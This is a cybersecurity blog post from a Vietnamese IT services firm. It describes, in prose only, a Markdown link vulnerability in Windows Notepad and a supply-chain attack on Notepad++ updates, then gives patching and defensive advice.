top of page

Malware risks hidden inside your everyday text editors - Notepad

  • 9 hours ago
  • 3 min read

When it comes to cyber threats, most of us immediately watch out for web browsers, software cracks, or sketchy apps downloaded from the internet. On the flip side, simple text editing tools like Notepad are almost always assumed to be 100% safe.

However, a recent chain of security alerts has completely flipped this mindset. Both the default Windows Notepad app and the advanced editor Notepad++ are now being turned into dangerous stepping stones for hackers to breach user systems.

1. Windows Notepad and the remote code execution vulnerability via Markdown

The first issue directly impacts the modern Windows Notepad app (the version distributed through the Microsoft Store). According to heated discussions on the tech forum Lobsters and detailed analysis by Igor's Lab, this tool is suffering from a critical flaw tracked as CVE-2026-20841.

Security vulnerability from Notepad
Security vulnerability from Notepad
What is Markdown? It is a lightweight markup language that lets users format text (like making words bold, adding headers, or inserting links) using plain text characters instead of relying on complex toolbars.

The vulnerability lies in how Windows Notepad processes and displays structured links within Markdown files (.md). The attack plays out like this:

  • Hackers craft a meticulously structured text file containing hidden malicious links.

  • As soon as a user opens this file in Notepad and accidentally clicks the link, the app automatically triggers unauthenticated system protocols.

  • Instead of just opening a regular webpage, this action inadvertently allows the computer to automatically download and run malicious code from the hacker's remote server, completely bypassing standard Windows security barriers.

The sophisticated supply chain attack targeting Notepad++

Unlike Windows Notepad, Notepad++ - a highly advanced tool incredibly popular among programmers and IT professionals - was hit using an entirely different playbook: a Supply Chain Attack.

According to a deep-dive analysis by cyber security firm Orca Security, hackers belonging to the group Lotus Blossom didn't directly modify the software's source code. Instead, they chose to hijack the server infrastructure that distributes the application's updates.

When a user clicks the familiar "Check for updates" feature, the system sends a request to the server. Here, hackers set up a highly sophisticated redirection mechanism:

  • The attack is not random or widespread; it is carefully filtered based on the victim's IP address.

  • High-value targets (including several organizations and tech businesses in Vietnam, Australia, El Salvador, and the Philippines) are redirected to a spoofed server controlled by the hackers.

  • From there, users unknowingly download an update package laced with a piece of malware called Chrysalis. Once installed, this malicious software runs silently in the background, creating a "backdoor" for hackers to spy on, steal data from, and completely control the victim's machine.

3. Comparison of the two new security threats in Notepad

To give you a clear, bird's-eye view of these two tech incidents, let's look at the summary table below:

Criteria

Windows Notepad Flaw

Notepad++ Attack

Identifier

CVE-2026-20841

CVE-2025-15556

Nature of Threat

Markdown data handling error (Triggers malware when users click links within the file).

Supply chain attack (Hijacking software update paths to plant malware).

Approach Strategy

Preys on the relaxed mindset of users opening text files received via Email, Telegram, etc.

Exploits the automated "Check for updates" feature that users completely trust.

Affected Targets

Windows users who open strangely structured text files.

Highly selective, targeting specific organizations and individuals (confirmed targets in Vietnam).

4. Practical solutions to protect your system from hidden risks

Fortunately, both Microsoft and the Notepad++ development team jumped on these issues quickly and released security patches. To stay safe and block any exploitation risks, you should take these steps immediately:

  • Update windows Notepad: Head over to the Microsoft Store, check your library, and update Notepad to the latest version (version 11.2510 or later is safe).

  • Upgrade Notepad++: Users need to manually download and upgrade the software to version 8.9.1 or higher. This activates an XML certificate validation mechanism, blocking the download of fake updates.

  • Ditch the "safe file" mindset: Totally drop the assumption that "text files are automatically safe." Any format—be it .txt, .md, .jpg, or .pdf—can be weaponized if the software rendering it has an unpatched bug.

  • Enterprise recommendations: Businesses should deploy Endpoint Protection solutions to monitor system behaviors, tighten policies against opening files from unverified sources, and closely track any strange processes spawning right after a user interacts with text files.

These two security incidents are textbook examples of a rising cybercrime trend: leveraging the most basic, unsuspected everyday apps to crack a user's defensive armor. Keeping your software updated and maintaining a healthy dose of skepticism toward every file you receive are the ultimate keys to keeping your data safe.

Comments

40051abd5a76713af8f015988fc6780e-blue-phone-icon-with-a-wave-on-it.webp
whatsapp-mobile-software-icon-png-image_6315991.png
pngtree-minimal-calendar-icon-vector-png-image_21233134.png
Logo-Zalo-Arc.webp
IPSIP logo transparent.png

IPSIP VIETNAM ONE MEMBER LIMITED LIABILITY COMPANY (IPSIP VIETNAM OMLLC)

Tax code: 0313859600

🏢 SH05.01, B4 Street, Saritown Area, An Khanh Ward, Ho Chi Minh City, Vietnam

​☎  +84 918 397 489

  • Linkedin
  • Facebook
  • TikTok
  • Email liên hệ

Our Services

Solutions for SMEs

SOC 24/7

NOC 24/7

IT Support

Cloud Security

Sign up to receive in-depth cybersecurity documents and news from IPSIP Vietnam.

bottom of page